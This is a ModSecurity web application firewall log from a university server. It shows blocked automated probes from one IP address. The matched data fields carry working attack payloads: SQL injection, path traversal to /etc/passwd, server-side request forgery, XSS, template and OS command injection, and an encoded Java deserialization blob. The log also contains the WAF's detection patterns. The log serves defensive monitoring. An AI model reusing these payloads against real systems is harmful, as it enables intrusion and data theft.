[Tue Aug 29 11:35:08.352956 2023] [:error] [pid 1303] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  1=1 found within ARGS:username: vaday' or 1=1#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/admin/login.php"] [unique_id "ZO11fMCo-f0AAAUXLkUAAABM"]
[Tue Aug 29 11:35:09.360009 2023] [:error] [pid 1231] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:url: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-content/plugins/wechat-broadcast/wechat/Image.php"] [unique_id "ZO11fcCo-f0AAATPtTcAAAAM"]
[Tue Aug 29 11:35:10.336344 2023] [:error] [pid 1270] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:s. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )-- - found within ARGS:s: 1' AND (SELECT 1 FROM (SELECT(SLEEP(6)))a)-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11fsCo-f0AAAT2JR4AAAAz"]
[Tue Aug 29 11:35:10.353235 2023] [:error] [pid 1291] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS_NAMES:"_fp_. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS_NAMES:\\x22_fp_: \\x22_fp_"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/HandleEvent"] [unique_id "ZO11fsCo-f0AAAULx9cAAABD"]
[Tue Aug 29 11:35:10.364001 2023] [:error] [pid 1296] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:page: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11fsCo-f0AAAUQ7tYAAABH"]
[Tue Aug 29 11:35:12.364671 2023] [:error] [pid 1353] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://0177.0.0.1/server-status found within TX:1: 0177.0.0.1/server-status"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfeb.unla.ac.id"] [uri "/"] [unique_id "ZO11gMCo-f0AAAVJXlgAAAAA"]
[Tue Aug 29 11:35:12.439728 2023] [:error] [pid 1253] [client 143.42.78.27] ModSecurity: Rule 7fe1ce5b6070 [id "981173"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "159"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "repositoryfeb.unla.ac.id"] [uri "/"] [unique_id "ZO11gMCo-f0AAATlLGUAAAAq"]
[Tue Aug 29 11:35:12.592542 2023] [:error] [pid 1253] [client 143.42.78.27] ModSecurity: Rule 7fe1c58deef8 [id "973302"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"][line "309"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "repositoryfeb.unla.ac.id"] [uri "/"] [unique_id "ZO11gMCo-f0AAATlLGUAAAAq"]
[Tue Aug 29 11:35:13.310076 2023] [:error] [pid 1289] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:id: ' AND (SELECT 7774 FROM (SELECT(SLEEP(6)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/classes/Master.php"] [unique_id "ZO11gcCo-f0AAAUJIz4AAABB"]
[Tue Aug 29 11:35:13.377247 2023] [:error] [pid 1231] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://0177.0.0.1/server-status found within TX:1: 0177.0.0.1/server-status"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfeb.unla.ac.id"] [uri "/"] [unique_id "ZO11gcCo-f0AAATPtT4AAAAM"]
[Tue Aug 29 11:35:14.325297 2023] [:error] [pid 1291] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:url: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php/bbs/index/download"] [unique_id "ZO11gsCo-f0AAAULx90AAABD"]
[Tue Aug 29 11:35:14.371254 2023] [:error] [pid 1185] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://0177.0.0.1/etc/passwd found within TX:1: 0177.0.0.1/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfeb.unla.ac.id"] [uri "/"] [unique_id "ZO11gsCo-f0AAAShCbkAAAAi"]
[Tue Aug 29 11:35:16.069278 2023] [:error] [pid 1307] [client 143.42.78.27] ModSecurity: Request body no files data length is larger than the configured limit (131072).. Deny with code (413) [hostname "repositoryfeb.unla.ac.id"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ZO11g8Co-f0AAAUbg2YAAABQ"]
[Tue Aug 29 11:35:16.341456 2023] [:error] [pid 1253] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cfg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:cfg: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php"] [unique_id "ZO11hMCo-f0AAATlLG4AAAAq"]
[Tue Aug 29 11:35:16.349149 2023] [:error] [pid 1238] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:backurl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:backurl: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/passport/index.php"] [unique_id "ZO11hMCo-f0AAATWYToAAAAa"]
[Tue Aug 29 11:35:16.376457 2023] [:error] [pid 1382] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: xor found within XML: xxxxorg.slf4j.ext.EventDatayv66vgAAADIAYwoAFAA8CgA9AD4KAD0APwoAQABBBwBCCgAFAEMHAEQKAAcARQgARgoABwBHBwBICgALADwKAAsASQoACwBKCABLCgATAEwHAE0IAE4HAE8HAFABAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAEExSZXN1bHRCYXNlRXhlYzsBAAhleGVjX2NtZAEAJihMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmc7AQADY21kAQASTGphdmEvbGFuZy9TdHJpbmc7AQABcAEAE0xqYXZhL2xhbmcvUHJvY2VzczsBAANmaXMBABVMamF2YS9pby9JbnB1dFN0cmVhbTsBAANpc3IBABtMamF2YS9pby9Jbn..."] [severity "CRITICAL"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ZO11hMCo-f0AAAVmuKkAAAAT"]
[Tue Aug 29 11:35:18.505210 2023] [:error] [pid 1253] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:Language. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22)}} found within ARGS:Language: de{${system(\\x22ls\\x22)}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/mailingupgrade.php"] [unique_id "ZO11hsCo-f0AAATlLHMAAAAq"]
[Tue Aug 29 11:35:18.531570 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:list[fullordering]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: updatexml( found within ARGS:list[fullordering]: updatexml(0x23,concat(1,md5(999999999)),1)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11hsCo-f0AAASEJZ0AAAAE"]
[Tue Aug 29 11:35:20.393872 2023] [:error] [pid 1297] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1'#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/admin/ajax.php"] [unique_id "ZO11iMCo-f0AAAUR87kAAABI"]
[Tue Aug 29 11:35:21.301285 2023] [:error] [pid 1278] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:vars[1][]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ] found within ARGS_NAMES:vars[1][]: vars[1][]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repositoryfeb.unla.ac.id"] [uri "/"] [unique_id "ZO11icCo-f0AAAT@KxQAAAA2"]
[Tue Aug 29 11:35:22.334931 2023] [:error] [pid 1290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:bwg_tag_id_bwg_thumbnails_0[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  --  found within ARGS:bwg_tag_id_bwg_thumbnails_0[]: )\\x22 union select 1,2,3,4,5,6,7,concat(md5(999999999), 0x2c, 8),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 -- g"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11isCo-f0AAAUKhCAAAABC"]
[Tue Aug 29 11:35:22.375626 2023] [:error] [pid 1236] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:categories. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ~ found within ARGS:categories: ~31~27~20union~20all~20select~20~27hongjing~27~2c~40~40version~2d~2d"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repositoryfeb.unla.ac.id"] [uri "/servlet/codesettree"] [unique_id "ZO11isCo-f0AAATUxTsAAAAW"]
[Tue Aug 29 11:35:24.313122 2023] [:error] [pid 1391] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://notburpcollaborator.net found within TX:1: notburpcollaborator.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfeb.unla.ac.id"] [uri "/Items/RemoteSearch/Image"] [unique_id "ZO11jMCo-f0AAAVvlHUAAAAe"]
[Tue Aug 29 11:35:24.344098 2023] [:error] [pid 1353] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:apis. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:apis: ../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/api/console/api_server"] [unique_id "ZO11jMCo-f0AAAVJXmgAAAAA"]
[Tue Aug 29 11:35:25.314586 2023] [:error] [pid 1247] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:post_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:post_id: (SELECT 3 FROM (SELECT SLEEP(7))enz)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11jcCo-f0AAATfd50AAAAk"]
[Tue Aug 29 11:35:25.364848 2023] [:error] [pid 1253] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'orQN'='orQN found within ARGS:username: test' AND (SELECT 4458 FROM (SELECT(SLEEP(6)))JblN) AND 'orQN'='orQN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/classes/Login.php"] [unique_id "ZO11jcCo-f0AAATlLIIAAAAq"]
[Tue Aug 29 11:35:26.357301 2023] [:error] [pid 1277] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ',''); found within ARGS:password: g','');import os;os.system('6563686f20224d6c566b6547744f4e7a464f597a41344e6d51344e477846633278795630644c4f45315022207c20626173653634202d64203e202f7573722f6c6f63616c2f6e6574737765657065722f77656261646d696e2f6f7574'.decode('hex'))#"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/webadmin/tools/unixlogin.php"] [unique_id "ZO11jsCo-f0AAAT9PRYAAAA1"]
[Tue Aug 29 11:35:27.302389 2023] [:error] [pid 1283] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:id[]: 1 AND (SELECT 321 FROM (SELECT(SLEEP(6)))je)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11j8Co-f0AAAUDQVEAAAA7"]
[Tue Aug 29 11:35:27.347876 2023] [:error] [pid 1290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:groupsIds[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )-- - found within ARGS:groupsIds[]: 1) AND (SELECT 3066 FROM (SELECT(SLEEP(5)))CEHy)-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11j8Co-f0AAAUKhCgAAABC"]
[Tue Aug 29 11:35:28.314378 2023] [:error] [pid 1354] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:username: admin' AND 4719=4719-- GZHh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/banker/index.php"] [unique_id "ZO11kMCo-f0AAAVK0LgAAAAB"]
